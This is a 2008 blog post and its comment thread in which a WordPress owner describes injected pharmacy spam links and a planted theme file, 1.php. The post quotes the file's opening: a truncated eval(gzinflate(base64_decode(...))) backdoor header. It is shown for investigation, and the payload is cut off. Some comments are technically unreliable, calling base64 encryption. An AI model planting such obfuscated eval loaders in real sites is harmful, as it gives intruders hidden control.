Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php. All the links forward to canadian-meds-shop.com. These are bad people: scammers and thieves.
I also found a strange file in my wordpress theme file, 1.php. The file started like this:
<?PHP
//Authentication
$login = “”; //Login
$pass = “”; //Pass
$md5_pass = “”; //If no pass then hash
eval(gzinflate(base64_decode(’HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//
I don’t know how this file got there or what it does but I’m pretty sure it’s bad stuff.
Do you want to try and figure out what this evil f’ing spam program does? Here is the virus file. Caution! This is a bad program!
Tell me what you find out, would you?
Now I’ve got to figure out how they got on my system…. grrrrrr.
October 2nd, 2008 at 9:54 am
Base64 is a method of encryption/decryption.
The virus, is actually a script that includes a “binary” executable in the form of text, using base64 ecryption. The PHP code uses the eval method of calling the
To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a “safe thread” that can be evaluated for it’s purposes.
The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.
Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attact them.
October 7th, 2008 at 1:23 pm
Most all blog hacks are from people not upgrading their blog software.
If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.
Hacker Forums
October 9th, 2008 at 9:59 pm
Hey Hacker Forums, my blog and all the plugins are fully up to date. but good try. :-(
Thanks for the comment and SEO. I’m not so keen on the self-promotion so I edited your links.
October 10th, 2008 at 7:17 am
try to print out the source with something like
<? echo gzinflate(base64_decode(’HJ3…
November 7th, 2008 at 9:40 am
Hey Lee,
Thanks for posting this. I found it by searching the first several characters of the base_64/gz hash. Same thing happened to me, just different file names. Nothing harmed other than the file placement. I have a joomla site.
I am wondering if you found out how the file was placed.
I only have http/error logs to go by, and I cannot determine the MO from it.
I have IP of the my offender, if you wish to compare notes, but I am most interested in the How than the Who right now.
Thanks!
November 7th, 2008 at 10:35 am
Patrick, I haven’t figured out how this file got there. All I’ve really done so far is changed my Wordpress password and haven’t gotten another attack. I wish I had a better answer. :-(